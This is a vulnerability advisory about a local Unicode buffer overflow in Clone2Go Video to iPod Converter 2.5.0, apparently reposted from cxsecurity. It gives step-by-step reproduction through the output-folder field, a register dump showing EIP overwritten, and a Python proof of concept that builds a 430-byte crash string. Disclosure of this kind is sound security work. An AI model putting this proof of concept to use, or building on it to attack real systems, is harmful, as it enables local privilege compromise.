Clone2Go Video to iPod Converter 2.5.0 – Unicode Buffer Overflow Vulnerability

A classic local unicode buffer overflow vulnerability has been discovered in the official Clone2Go Video to iPod Converter v2.5.0 software. The vulnerability allows local attackers to gain higher system or access privileges by exploitation of a classic unicode buffer overflow vulnerability.

Local attackers with low- privilege system user account or restricted system privileges are able to compromise the local system by exploitation of a classic unicode buffer overflow vulnerability. The local attacker copies a specific byte size string to the options index files input to overflow the process and overwrite the registers like ECX,EBX or EIP. Thus allows the local attacker to takeover the system process of the software client to compromise the local system/server.

Vulnerable Module(s):
[+] Menu > Edit > Options > Set Output folder (Input)

Product & Service Introduction:
===============================

Video to iPod Converter is a powerful and easy-to-use iPod video conversion software tool for Apple iPod fans. With this video converter for iPod, you can convert videos in almost any popular video format, including AVI, WMV, ASF, MOV, MP4, RM, RMVB, FLV, MKV, AVS, MPG, VOB for playback on the new iPod touch, iPod classic, iPod nano 5G with camera.

(Copy of the Vendor Homepage: http://www.clone2go.com/)

Date of Discovery:
==================

2018-09-11

Exploitation Technique:
=======================

Local

Platfom Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================

Restrict the Set Output folder input by size and allocate the memory to deny to overflow the process by interaction with the vulnerable input field.

Levels Risk :

Proof of Concept (PoC):
=======================

The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the software and start the client
2. Copy  the AAAA...string from bof.txt to clipboard
3. Run VideoConverter.exex
4. Go Menu Menu > Edit > Options > Set Output folder (Input)
5. Paste it the input AAAA....string and click Open
6. A messagebox opens click ok
7. Software will stable crash or shut down
8. Successful reproduce of the local buffer overflow vulnerability!

--- Registers ---
EAX 8B368BC6
ECX 00410041 VideoCon.00410041 <--- Overwrite
EDX 76F16CCD ntdll.76F16CCD
EBX 00410041 VideoCon.00410041 <--- Overwrite
ESP 00123600
EBP 00123628
ESI 8B368BC6
EDI 00000000
EIP 00410041 VideoCon.00410041 <--- Overwrite

--- Code Python ---
#!/usr/bin/python

buffer = "\x41" * 430

poc = buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
 
print "POC Created by ZwX"
print " Email: msk4@live.fr"

References:
===========

[#] cxsecurity.com

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*